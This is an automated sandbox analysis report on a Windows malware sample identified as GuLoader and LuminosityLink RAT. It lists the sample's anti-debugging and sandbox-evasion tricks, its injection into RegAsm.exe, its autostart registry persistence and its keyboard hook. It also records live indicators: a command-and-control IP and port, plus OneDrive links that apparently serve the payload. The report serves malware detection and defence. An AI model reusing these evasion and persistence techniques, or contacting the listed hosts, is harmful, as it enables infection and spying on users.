
Analysis Report New Inquiry 903838737777721102029393003938.exe

Overview

General Information

Sample Name: New Inquiry 903838737777721102029393003938.exe
Analysis ID: 112557
MD5: 01a54f73856cfb74a3bbba47bcec227b
SHA1: ed2ed885dcd7be832cdae5c189bd7db78ca9eaa2
SHA256: 759c87f02d5850ee317454dc8242067d042a320f653946c9162b645c0ae68ba6

Most interesting Screenshot:

Detection

GuLoader LuminosityLink
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Potential malicious icon found
Yara detected GuLoader
Yara detected LuminosityLink RAT
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Contains functionality to hide a thread from the debugger
Creates an autostart registry key pointing to binary in C:\Windows
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Hides that the sample has been downloaded from the Internet (zone.identifier)
Hides threads from debuggers
Installs a global keyboard hook
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64native
  • New Inquiry 903838737777721102029393003938.exe (PID: 6652 cmdline: 'C:\Users\user\Desktop\New Inquiry 903838737777721102029393003938.exe' MD5: 01A54F73856CFB74A3BBBA47BCEC227B)
    • RegAsm.exe (PID: 1576 cmdline: 'C:\Users\user\Desktop\New Inquiry 903838737777721102029393003938.exe' MD5: 6AFAE79556E125202DCF1D3FE74A3638)
    • RegAsm.exe (PID: 1440 cmdline: 'C:\Users\user\Desktop\New Inquiry 903838737777721102029393003938.exe' MD5: 6AFAE79556E125202DCF1D3FE74A3638)
      • conhost.exe (PID: 1584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: C221707E5CE93515AC87507E19181E2A)
      • anibtcent.exe.exe (PID: 4188 cmdline: 'C:\ProgramData\782401\anibtcent.exe.exe' MD5: 6AFAE79556E125202DCF1D3FE74A3638)
        • conhost.exe (PID: 1500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: C221707E5CE93515AC87507E19181E2A)
  • demisphereklediskene.exe (PID: 1812 cmdline: 'C:\Users\user\Hustankesgy3\demisphereklediskene.exe' MD5: 01A54F73856CFB74A3BBBA47BCEC227B)
    • RegAsm.exe (PID: 4328 cmdline: 'C:\Users\user\Hustankesgy3\demisphereklediskene.exe' MD5: 6AFAE79556E125202DCF1D3FE74A3638)
      • conhost.exe (PID: 4084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: C221707E5CE93515AC87507E19181E2A)
  • RegAsm.exe (PID: 2652 cmdline: 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe' MD5: 6AFAE79556E125202DCF1D3FE74A3638)
    • conhost.exe (PID: 5952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: C221707E5CE93515AC87507E19181E2A)
  • demisphereklediskene.exe (PID: 2140 cmdline: 'C:\Users\user\Hustankesgy3\demisphereklediskene.exe' MD5: 01A54F73856CFB74A3BBBA47BCEC227B)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
0000000D.00000002.24300444936.0000000000F00000.00000040.00000001.sdmp | JoeSecurity_GuLoader | Yara detected GuLoader | Joe Security |
0000000D.00000002.24321865954.000000001DD3A000.00000004.00000001.sdmp | JoeSecurity_LuminosityLink | Yara detected LuminosityLink RAT | Joe Security |
00000013.00000002.24264401230.0000000000C30000.00000040.00000001.sdmp | JoeSecurity_GuLoader | Yara detected GuLoader | Joe Security |
Process Memory Space: RegAsm.exe PID: 1440 | JoeSecurity_GuLoader | Yara detected GuLoader | Joe Security |
Process Memory Space: RegAsm.exe PID: 1440 | JoeSecurity_LuminosityLink | Yara detected LuminosityLink RAT | Joe Security |

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Multi AV Scanner detection for dropped file
Source: C:\Users\user\Hustankesgy3\demisphereklediskene.exe | Virustotal: Detection: 20%
Source: C:\Users\user\Hustankesgy3\demisphereklediskene.exe | ReversingLabs: Detection: 18%
Multi AV Scanner detection for submitted file
Source: New Inquiry 903838737777721102029393003938.exe | Virustotal: Detection: 20%
Source: New Inquiry 903838737777721102029393003938.exe | ReversingLabs: Detection: 18%
Yara detected LuminosityLink RAT
Source: Yara match | File source: 0000000D.00000002.24321865954.000000001DD3A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 1440, type: MEMORY

Bitcoin Miner:

Yara detected LuminosityLink RAT
Source: Yara match | File source: 0000000D.00000002.24321865954.000000001DD3A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 1440, type: MEMORY
Source: global traffic | TCP traffic: 192.168.0.80:49780 -> 194.5.97.46:3021
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | DNS traffic detected: queries for: onedrive.live.com
Source: RegAsm.exe, 0000000D.00000002.24301433100.00000000010A5000.00000004.00000020.sdmp, RegAsm.exe, 00000013.00000002.24265379647.0000000000E64000.00000004.00000020.sdmp | String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
Source: RegAsm.exe, 0000000D.00000002.24301433100.00000000010A5000.00000004.00000020.sdmp, RegAsm.exe, 00000013.00000002.24265379647.0000000000E64000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.digicert.com0:
Source: RegAsm.exe, 0000000D.00000002.24301548535.00000000010C1000.00000004.00000020.sdmp, RegAsm.exe, 00000013.00000002.24265379647.0000000000E64000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.msocsp.com0
Source: RegAsm.exe, 0000000D.00000002.24328207020.0000000021190000.00000002.00000001.sdmp | String found in binary or memory: https://aka.ms/hcsadmin
Source: RegAsm.exe, 0000000D.00000002.24301095324.000000000107D000.00000004.00000020.sdmp, RegAsm.exe, 00000013.00000002.24265379647.0000000000E64000.00000004.00000020.sdmp, RegAsm.exe, 00000013.00000002.24265110684.0000000000E2E000.00000004.00000020.sdmp | String found in binary or memory: https://eaup2w.sn.files.1drv.com/
Source: RegAsm.exe, 00000013.00000002.24265379647.0000000000E64000.00000004.00000020.sdmp, RegAsm.exe, 00000013.00000002.24265299276.0000000000E52000.00000004.00000020.sdmp | String found in binary or memory: https://eaup2w.sn.files.1drv.com/y4m4bqAkwHQUJx1iHbF6prKSSCddXNt-56Mg951zMrckoiAx-x88t2pks0UEJqWB7st
Source: RegAsm.exe, 0000000D.00000002.24301433100.00000000010A5000.00000004.00000020.sdmp, RegAsm.exe, 0000000D.00000002.24301548535.00000000010C1000.00000004.00000020.sdmp | String found in binary or memory: https://eaup2w.sn.files.1drv.com/y4mcRoU26afjmMcM96C_CG1xmFAJaGVWXqZWLE8oSmKi-bsn2pOmBTUtvaCnggDIr1k
Source: RegAsm.exe, 0000000D.00000002.24300776016.000000000104B000.00000004.00000020.sdmp, RegAsm.exe, 00000013.00000002.24264785299.0000000000DDB000.00000004.00000020.sdmp | String found in binary or memory: https://onedrive.live.com/
Source: RegAsm.exe, 00000013.00000002.24265110684.0000000000E2E000.00000004.00000020.sdmp | String found in binary or memory: https://onedrive.live.com/download?cid=249E8FCE0A15C968&resid=249E8FCE0A15C968%211276&authkey=ADoYXV
Source: RegAsm.exe, 00000013.00000002.24264785299.0000000000DDB000.00000004.00000020.sdmp | String found in binary or memory: https://onedrive.live.com/l
Source: RegAsm.exe, 0000000D.00000002.24301433100.00000000010A5000.00000004.00000020.sdmp, RegAsm.exe, 00000013.00000002.24265379647.0000000000E64000.00000004.00000020.sdmp | String found in binary or memory: https://www.digicert.com/CPS0

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Installs a global keyboard hook
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Windows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

E-Banking Fraud:

Yara detected LuminosityLink RAT
Source: Yara match | File source: 0000000D.00000002.24321865954.000000001DD3A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 1440, type: MEMORY

System Summary:

Potential malicious icon found
Source: initial sample | Icon embedded in PE file: bad icon match: 20047c7c70f0e004
Source: C:\Users\user\Desktop\New Inquiry 903838737777721102029393003938.exe | Code function: 3_2_02240A3F NtSetInformationThread,3_2_02240A3F
Source: C:\Users\user\Desktop\New Inquiry 903838737777721102029393003938.exe | Code function: 3_2_02240AA2 NtSetInformationThread,3_2_02240AA2
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 13_2_00F09EF3 NtSetInformationThread,13_2_00F09EF3
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 13_2_00F005E5 EnumWindows,NtSetInformationThread,13_2_00F005E5
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 13_2_00F09B4C NtProtectVirtualMemory,13_2_00F09B4C
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 13_2_00F016BE NtSetInformationThread,13_2_00F016BE
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 13_2_00F00A7A NtSetInformationThread,13_2_00F00A7A
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 13_2_00F09E56 NtProtectVirtualMemory,13_2_00F09E56
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 13_2_00F00631 NtSetInformationThread,13_2_00F00631
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 13_2_00F00629 NtSetInformationThread,13_2_00F00629
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 13_2_00F011F0 NtSetInformationThread,13_2_00F011F0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 13_2_00F01719 NtSetInformationThread,13_2_00F01719
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 13_2_204F2CD2 NtQuerySystemInformation,13_2_204F2CD2
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 13_2_204F2C97 NtQuerySystemInformation,13_2_204F2C97
Source: C:\Users\user\Hustankesgy3\demisphereklediskene.exe | Code function: 18_2_021C0A3F NtSetInformationThread,18_2_021C0A3F
Source: C:\Users\user\Hustankesgy3\demisphereklediskene.exe | Code function: 18_2_021C0AA2 NtSetInformationThread,18_2_021C0AA2
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 19_2_00C39EF3 NtSetInformationThread,19_2_00C39EF3
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 19_2_00C305E5 EnumWindows,NtSetInformationThread,19_2_00C305E5
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 19_2_00C39B4C NtProtectVirtualMemory,19_2_00C39B4C
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 19_2_00C316BE NtSetInformationThread,19_2_00C316BE
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 19_2_00C39E56 NtProtectVirtualMemory,19_2_00C39E56
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 19_2_00C30A7A NtSetInformationThread,19_2_00C30A7A
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 19_2_00C3A824 NtQueryInformationProcess,19_2_00C3A824
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 19_2_00C30629 NtSetInformationThread,19_2_00C30629
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 19_2_00C30631 NtSetInformationThread,19_2_00C30631
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 19_2_00C311F0 NtSetInformationThread,19_2_00C311F0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 19_2_00C3A30D NtQueryInformationProcess,19_2_00C3A30D
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 19_2_00C39F12 NtQueryInformationProcess,19_2_00C39F12
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 19_2_00C31719 NtSetInformationThread,19_2_00C31719
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | File created: C:\Windows\SysWOW64\clientsvr.exe
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 13_2_00F005E5 13_2_00F005E5
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 13_2_1FEE1E1E 13_2_1FEE1E1E
Source: C:\ProgramData\782401\anibtcent.exe.exe | Code function: 16_2_050F01B7 16_2_050F01B7
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 19_2_00C305E5 19_2_00C305E5
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 21_2_00C801B7 21_2_00C801B7
Source: New Inquiry 903838737777721102029393003938.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: demisphereklediskene.exe.13.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: New Inquiry 903838737777721102029393003938.exe, 00000003.00000002.24036753540.0000000000413000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameStrenger.exe vs New Inquiry 903838737777721102029393003938.exe
Source: New Inquiry 903838737777721102029393003938.exe, 00000003.00000002.24037858669.00000000005E0000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenameuser32j% vs New Inquiry 903838737777721102029393003938.exe
Source: New Inquiry 903838737777721102029393003938.exe | Binary or memory string: OriginalFilenameStrenger.exe vs New Inquiry 903838737777721102029393003938.exe
Source: C:\Users\user\Desktop\New Inquiry 903838737777721102029393003938.exe | Section loaded: vb6zz.dll
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Section loaded: sfc.dll
Source: C:\Users\user\Hustankesgy3\demisphereklediskene.exe | Section loaded: vb6zz.dll
Source: classification engine | Classification label: mal100.rans.troj.spyw.evad.winEXE@16/8@10/2
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 13_2_204F2A92 AdjustTokenPrivileges,13_2_204F2A92
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 13_2_204F2A5B AdjustTokenPrivileges,13_2_204F2A5B
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | File created: C:\Users\user\Hustankesgy3
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1500:120:WilError_02
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1584:120:WilError_02
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4084:120:WilError_02
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5952:120:WilError_02
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Mutant created: \Sessions\1\BaseNamedObjects\7433cdb324b04dd5e3c3db213381216c7c539baa
Source: New Inquiry 903838737777721102029393003938.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\New Inquiry 903838737777721102029393003938.exe | Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: C:\Users\user\Hustankesgy3\demisphereklediskene.exe | Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9fbf7494605b6eb9632b0c9bfc1683d9\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\ProgramData\782401\anibtcent.exe.exe | Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9fbf7494605b6eb9632b0c9bfc1683d9\mscorlib.ni.dll
Source: C:\ProgramData\782401\anibtcent.exe.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\ProgramData\782401\anibtcent.exe.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\New Inquiry 903838737777721102029393003938.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: New Inquiry 903838737777721102029393003938.exe | Virustotal: Detection: 20%
Source: New Inquiry 903838737777721102029393003938.exe | ReversingLabs: Detection: 18%
Source: unknown | Process created: C:\Users\user\Desktop\New Inquiry 903838737777721102029393003938.exe 'C:\Users\user\Desktop\New Inquiry 903838737777721102029393003938.exe'
Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 'C:\Users\user\Desktop\New Inquiry 903838737777721102029393003938.exe'
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\ProgramData\782401\anibtcent.exe.exe 'C:\ProgramData\782401\anibtcent.exe.exe'
Source: unknown | Process created: C:\Users\user\Hustankesgy3\demisphereklediskene.exe 'C:\Users\user\Hustankesgy3\demisphereklediskene.exe'
Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 'C:\Users\user\Hustankesgy3\demisphereklediskene.exe'
Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe'
Source: C:\Users\user\Desktop\New Inquiry 903838737777721102029393003938.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 'C:\Users\user\Desktop\New Inquiry 903838737777721102029393003938.exe'
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Process created: C:\ProgramData\782401\anibtcent.exe.exe 'C:\ProgramData\782401\anibtcent.exe.exe'
Source: C:\Users\user\Hustankesgy3\demisphereklediskene.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 'C:\Users\user\Hustankesgy3\demisphereklediskene.exe'
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9554_none_d08d6fa2442aa556\MSVCR80.dll
Source: Binary string: RegAsm.pdb source: RegAsm.exe, 0000000D.00000002.24325004854.000000001FFF5000.00000004.00000001.sdmp, anibtcent.exe.exe, anibtcent.exe.exe.13.dr
Source: Binary string: mscorrc.pdb source: RegAsm.exe, 0000000D.00000002.24324313659.000000001FF60000.00000002.00000001.sdmp, RegAsm.exe, 00000013.00000002.24283755110.000000001FDF0000.00000002.00000001.sdmp

            Data Obfuscation:

            barindex
            Yara detected GuLoaderShow sources
            Source: Yara matchFile source: 0000000D.00000002.24300444936.0000000000F00000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.24264401230.0000000000C30000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 1440, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4328, type: MEMORY
            Source: C:\Users\user\Desktop\New Inquiry 903838737777721102029393003938.exeCode function: 3_2_0040E750 pushad ; ret 3_2_0040E7DF
            Source: C:\Users\user\Desktop\New Inquiry 903838737777721102029393003938.exeCode function: 3_2_00406A5A push ecx; retf 3_2_00406A5B
            Source: C:\Users\user\Desktop\New Inquiry 903838737777721102029393003938.exeCode function: 3_2_0040E77E pushad ; ret 3_2_0040E7DF
            Source: C:\Users\user\Desktop\New Inquiry 903838737777721102029393003938.exeCode function: 3_2_00406418 push ecx; retf 3_2_0040642F
            Source: C:\Users\user\Desktop\New Inquiry 903838737777721102029393003938.exeCode function: 3_2_00409FC6 push ecx; ret 3_2_00409FC7
            Source: C:\Users\user\Desktop\New Inquiry 903838737777721102029393003938.exeCode function: 3_2_0040A6C9 push ebx; retf 3_2_0040A6D3
            Source: C:\Users\user\Desktop\New Inquiry 903838737777721102029393003938.exeCode function: 3_2_00409FE7 push ebx; retf 3_2_00409FF3
            Source: C:\Users\user\Desktop\New Inquiry 903838737777721102029393003938.exeCode function: 3_2_0040A6EC push ebx; retf 3_2_0040A703
            Source: C:\Users\user\Desktop\New Inquiry 903838737777721102029393003938.exeCode function: 3_2_00409F88 push ebx; retf 3_2_00409F8F
            Source: C:\Users\user\Desktop\New Inquiry 903838737777721102029393003938.exeCode function: 3_2_0040A68E push ebx; retf 3_2_0040A703
            Source: C:\Users\user\Desktop\New Inquiry 903838737777721102029393003938.exe | Code function: 3_2_00409FAC push ebx; retf 3_2_00409FBF
            Source: C:\Users\user\Desktop\New Inquiry 903838737777721102029393003938.exe | Code function: 3_2_0040A0B0 push ecx; ret 3_2_0040A0C3
            Source: C:\Users\user\Desktop\New Inquiry 903838737777721102029393003938.exe | Code function: 3_2_004063B8 push ecx; retf 3_2_0040642F
            Source: C:\Users\user\Desktop\New Inquiry 903838737777721102029393003938.exe | Code function: 3_2_00409EBE push ebp; retf 3_2_00409EF3
            Source: C:\Users\user\Desktop\New Inquiry 903838737777721102029393003938.exe | Code function: 3_2_02240A3F push cs; retf 3_2_02240A91
            Source: C:\Users\user\Desktop\New Inquiry 903838737777721102029393003938.exe | Code function: 3_2_02243604 push edi; ret 3_2_0224360E
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 13_2_1DB256F5 push edx; iretd 13_2_1DB256F6
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 13_2_1DB22E29 push ds; iretd 13_2_1DB23206
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 13_2_1DB23662 push ecx; ret 13_2_1DB2366D
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 13_2_1FEE39A1 push ebp; retf 13_2_1FEE39A2
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 13_2_1FEE3D9B push esi; retf 13_2_1FEE3DA2
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 13_2_1FEE3D98 push esi; retf 13_2_1FEE3D9A
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 13_2_1FEE3921 push esp; retf 13_2_1FEE3922
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 13_2_1FEE3EEB push edi; retf 13_2_1FEE3EF2
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 13_2_1FEE3EE8 push edi; retf 13_2_1FEE3EEA
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 13_2_1FEE0AD8 push F01DCB26h; retf 13_2_1FEE0ADD
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 13_2_1FEE3843 push esp; retf 13_2_1FEE384A
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 13_2_1FEE3841 push esp; retf 13_2_1FEE3842
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 13_2_1FEE0006 push ss; retf 13_2_1FEE002E
            Source: C:\Users\user\Hustankesgy3\demisphereklediskene.exe | Code function: 18_2_021C0A3F push cs; retf 18_2_021C0A91
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 21_2_0241000C pushfd ; retf 21_2_02410053
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | File created: C:\ProgramData\782401\anibtcent.exe.exe
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | File created: C:\Windows\SysWOW64\clientsvr.exe
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | File created: C:\Users\user\Hustankesgy3\demisphereklediskene.exe

            Boot Survival:

            Creates an autostart registry key pointing to binary in C:\Windows
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce HWKP
            Creates an undocumented autostart registry key
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit
            Creates multiple autostart registry keys
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce monotonousnesses
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce HWKP

            Hooking and other Techniques for Hiding and Protection:

            Hides that the sample has been downloaded from the Internet (zone.identifier)
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe:Zone.Identifier read attributes | delete
            Source: C:\Users\user\Desktop\New Inquiry 903838737777721102029393003938.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\782401\anibtcent.exe.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Hustankesgy3\demisphereklediskene.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
